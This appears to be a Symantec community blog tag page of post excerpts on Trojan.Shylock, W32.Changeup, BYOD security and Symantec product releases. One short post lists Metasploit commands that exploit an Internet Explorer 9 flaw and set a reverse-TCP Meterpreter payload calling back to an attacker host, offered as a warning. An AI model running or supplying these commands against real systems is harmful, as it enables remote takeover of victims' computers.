
Security Community Blog

Showing posts tagged with Symantec Protection Suites (SPS)
Showing posts in English
Brandon Noble | 28 Aug 2012 | 0 comments

We have been seeing a recent wave of Trojan.Shylock variants with a lot more functionality than the older versions we have been used to.

Initially, many of these variants are detected generically as Backdoor.Trojan or Trojan Horse, but our new Shylock heuristic signatures (Trojan.Shylock!gen6 and Trojan.Shylock!gen7) should be changing this to a more accurate naming convention, and should be picking up a much wider spread of these threats.

Additionally, we are hearing about some behavior that we have not been able to reproduce. Reports are saying that legitimate documents are getting hidden and then shortcuts with the same name as the document are being added in their place. These shortcuts actually launch a thumbs.db(x) file which is the Shylock Trojan, and they are meant to trick the user into running the threat. This is common behavior for threats, as noted in this blog article from May 2012,...

Duncan Mills | 04 Apr 2013 | 0 comments

The increased use in the workplace of user-owned devices such as smartphones and tablets, often referred to as bring your own device (BYOD), provides businesses with significant productivity and cost benefits. However, it also presents a number of complex challenges related to security.

Due to the rise of smart media devices like smartphones, tablets and ultrabooks, it is estimated that potentially, as many as 30-35%* of endpoints connected to a company’s network could be unmanaged. These are more at risk than managed endpoints which are typically subject to software patching and endpoint security policies.

Of course unmanaged endpoints are still protected by your perimeter security, such as secure web gateways. However, these have typically evolved from caching proxies and URL filters. What you need is an additional layer of security that provides the best possible levels of protection for unmanaged endpoints.

Symantec Web Gateway (SWG) will...

SebastianZ | 02 Feb 2013 | 0 comments

A small compilation from the Symantec Portfolio including Data Sheets of several Symantec Security Products.

 

- Symantec™ Endpoint Protection 12.1.2 (10/12)
http://www.symantec.com/endpoint-protection/data-s...

- Symantec Endpoint Protection Small Business Edition 2013 (11/12)
http://www.symantec.com/endpoint-protection-small-...

- Symantec™ Protection Suite Enterprise Edition - Comprehensive, powerful endpoint, messaging, and Web protection, for less money (06/11)
...

piero_depaoli | 10 Jan 2013 | 0 comments

Microsoft gets it. Today, it makes no sense to release an operating system, especially a game-changer like Windows 8, without some form of basic antivirus protection. That’s why Windows 8 comes preloaded with a default form of protection, Windows Defender, that automatically kicks in when the system does not boot up with installed third-party protection.

 

If you get Defender for free with Windows 8, is there any point to getting any further protection? Yes -- at least 83 to begin with…

 

The numbers tell a compelling performance story

In side-by-side tests conducted by PassMark, an independent laboratory, Windows 8 with Symantec Endpoint Protection 12 consistently outperformed Windows 8 without it (with Defender as its default). Consider the highlights:

 

  • 83% faster scanning: End users spend more time working, less time managing interruptions.
...

pauldchavez | 03 Dec 2012 | 0 comments

Symantec would like to announce the general availability of Symantec Mail Security for Microsoft Exchange v7.0 (SMSMSE 7.0). Microsoft Exchange continues to be the leading application used for business communication across email, and organizations must protect this environment from email-borne threats and the loss of sensitive data. Symantec Mail Security for Microsoft Exchange v7.0 fully supports the latest Microsoft Exchange versions to maximize protection.

Summary of New Features:

• Support for Microsoft Exchange 2013 and Microsoft® Hosted Exchange environments

• Out-of-the-box content filtering templates for protection against data loss

• Improved anti-malware and anti-spam effectiveness through advanced heuristics

• Improved manageability with full message quarantine

• Up to 30 percent performance improvement for mailbox scanning

• Microsoft® System Center Operations Manager 2007 R2 support for...

Brandon Noble | 17 May 2013 | 12 comments

I. BACKGROUND:
In mid-2009, W32.Changeup was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created. Since November 2012 we have seen weekly spikes in the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.

 

II. THREAT DETAILS:
When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...

James Hanlon | 07 Dec 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hacktivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increase in web-based attacks and an increased focus and intensity of advanced persistent...

Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

 

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT infrastructure.

When selecting a new service they have either gone to tender or bought an off-the-shelf solution upon recommendation from colleagues/friends.

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and, most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks.

One example is from a customer who had one product designed to AV scan the contents of a USB pen drive upon connection to the machine, and another product to encrypt USB pen drives upon connection. This is great if the admin could...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello,
A vulnerability in IE 9 was discovered on 17/09/2012 which can be exploited with the following commands in Backtrack 5 R2:

Metasploit:

- msfupdate
- use exploit/windows/browser/ie_execcommand_uaf
- set SRVHOST 192.168 ...
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168 ...
- exploit

Let's be careful on the network.

hugs

Brandon Noble | 11 Sep 2012 | 0 comments

As a Security Response Liaison, I’m often asked for links to specific information that's available on our public website. Here is a simple list of the more common pages I use for reference.
 

File-Based Protection (Traditional Antivirus)